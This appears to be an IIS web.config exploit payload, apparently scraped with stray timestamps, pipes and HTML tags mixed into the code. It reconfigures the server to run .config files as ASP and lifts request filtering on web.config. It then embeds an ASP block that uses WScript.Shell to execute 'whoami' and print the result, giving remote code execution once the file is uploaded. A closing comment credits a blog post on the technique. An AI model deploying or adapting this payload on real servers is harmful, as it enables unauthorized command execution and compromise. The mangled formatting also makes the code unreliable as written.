2018-07-07 10:04:55 +00:00
|
|
|
|
<?xml version="1.0″ encoding="UTF-8″?>
|
|
|
|
|
<configuration>
|
|
|
|
|
<system.webServer>
|
|
|
|
|
<handlers accessPolicy="Read, Script, Write">
|
2019-11-16 13:53:42 +00:00
|
|
|
|
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
2018-07-07 10:04:55 +00:00
|
|
|
|
</handlers>
|
|
|
|
|
<security>
|
|
|
|
|
<requestFiltering>
|
|
|
|
|
<fileExtensions>
|
|
|
|
|
<remove fileExtension=".config" />
|
|
|
|
|
</fileExtensions>
|
|
|
|
|
<hiddenSegments>
|
|
|
|
|
<remove segment="web.config" />
|
|
|
|
|
</hiddenSegments>
|
|
|
|
|
</requestFiltering>
|
|
|
|
|
</security>
|
|
|
|
|
</system.webServer>
|
|
|
|
|
<appSettings>
|
|
|
|
|
</appSettings>
|
|
|
|
|
</configuration>
|
|
|
|
|
<!–
|
|
|
|
|
<% Response.write("-"&"->")
|
|
|
|
|
Response.write("</p>
|
|
|
|
|
<pre>")</p>
|
|
|
|
|
<p>Set wShell1 = CreateObject("WScript.Shell")
|
|
|
|
|
Set cmd1 = wShell1.Exec("whoami")
|
|
|
|
|
output1 = cmd1.StdOut.Readall()
|
|
|
|
|
set cmd1 = nothing: Set wShell1 = nothing</p>
|
|
|
|
|
<p>Response.write(output1)
|
|
|
|
|
Response.write("</pre>
|
|
|
|
|
<p><!-"&"-") %>
|
|
|
|
|
–>
|
|
|
|
|
|
|
|
|
|
<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->
|